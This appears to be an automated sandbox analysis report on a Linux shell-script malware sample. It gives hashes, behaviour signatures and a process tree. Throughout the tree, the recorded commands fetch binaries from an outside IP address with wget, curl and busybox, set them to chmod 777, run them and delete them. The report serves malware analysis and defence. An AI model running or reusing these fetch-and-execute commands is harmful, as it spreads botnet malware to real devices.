Analysis
-
max time kernel
70s -
max time network
72s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
18/10/2024, 03:02
Static task
static1
Behavioral task
behavioral1
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh
-
Size
10KB
-
MD5
8c5495a4b70dcc94500f7181a9826b51
-
SHA1
e9b6f579f9aa552f232b5d99477d13fc078673b8
-
SHA256
edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc
-
SHA512
bcfc0e62ad7d07abc2d257f1d71feb10c7b88d676d0ab8c87eec62eca6741bb3c1a6f2ed6ff2848c04eda7d894761fbb30a7b7cbd4e9320bf0689496b94aa6ba
-
SSDEEP
96:ojMdujMFHqjMdpMojMkMci+D2uLd0Q/4YAZlx8tlYisYUZVO9NOCbNWFhvUZVO9k:dyHLY0MNWFh0EFh/u
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh/tmp/edd1fc34eb715fa06f126afd4f715311a15fc1d52df8e3e2f4da70372bc449bc.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:715
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:737
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:748
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:764
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:773
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:802
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:808
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:814
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:832
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:854
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:859
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:865
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:871
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:877
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:883
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:889
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:895
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:901
-
-
/bin/chmodchmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:907
-
-
/bin/chmodchmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx942⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:913
-
-
/bin/chmodchmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:919
-
-
/bin/chmodchmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:925
-
-
/bin/chmodchmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug122⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:931
-
-
/bin/chmodchmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:937
-
-
/bin/chmodchmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3./3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 3wDzYpBDBabysp43dimFTylVEdU479lZE32⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:943
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:949
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:955
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:961
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:967
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:973
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:979
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97